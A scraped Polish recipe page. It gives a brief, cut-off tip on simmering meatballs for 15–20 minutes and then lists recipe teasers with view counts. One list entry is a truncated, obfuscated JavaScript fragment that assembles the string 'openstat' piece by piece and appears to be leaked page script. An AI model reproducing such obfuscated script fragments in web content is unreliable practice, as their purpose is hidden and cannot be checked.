Jak długo gotować pulpety, żeby były miękkie?

Pierwsze, co musisz wiedzieć o idealnie miękkich pulpetach: gotuj je przez 15-20 minut na bardzo małym ogniu. Zbyt mocne wrzenie sprawi, że staną się twarde jak kamienie! Jeśli gotujesz mniejsze pulpeciki (wielkości orzecha włoskiego), wystarczy 12-15 minut. Te większe potrzebują pełnych 20 minut. I koniecznie sprawdź jeden na próbę, przekrawając go – środek powinien być …
Najnowsze przepisy
(function(){ xw43_="o"+("p"+"")+"en"+"";xw43_+="s"+("tat")+( ⇖ 8
Szybkie śniadanie z BlendyGo 3 i BlendyPack Ostatnio mam... ⇖ 13
Prosty deser z kaszą manną i miodem to idealny przepis na... ⇖ 18
Pesto sardo z orzechami włoskimi, smak Sardynii w mojej... ⇖ 14
O kruchych ciastkach chyba nie trzeba dużo mówić na... ⇖ 23
Przepisy z bloga
Nie zawsze mamy czas (albo chęć), by wieczorem stać przy... ⇖ 56
Chcesz zamrozić borówki amerykańskie, ale nie wiesz jak?... ⇖ 81
Mrożenie sajgonek to sztuka! Odkryj sekrety, jak zachować... ⇖ 89
Poznaj sekrety mrożenia puree z dyni! Zachowaj smak... ⇖ 76
Zastanawiasz się, czy mrozić lasagne? Odkryj praktyczne... ⇖ 90
Przepisy na czasie
Te ogórki to prawdziwy słoikowy hit, który robi furorę... ⇖ 1458
Pierogi ruskie to klasyk, który zawsze się sprawdza!... ⇖ 1059
Sałatka Słoikowa od Teściowej to sprawdzony przepis na... ⇖ 645
Zapraszam Was serdecznie do kolejnego przepisu, w którym... ⇖ 558
Uwielbiam , chociaż nie jestem przesadnie mięsożerna.I... ⇖ 530
Najlepszy kompot na zimę to jest ten z mirabelek, który... ⇖ 470
Plasterki kanapkowe na zimę to znakomita propozycja na... ⇖ 466
Znakomite na zimę złote ogórki, które świetnie nadają... ⇖ 461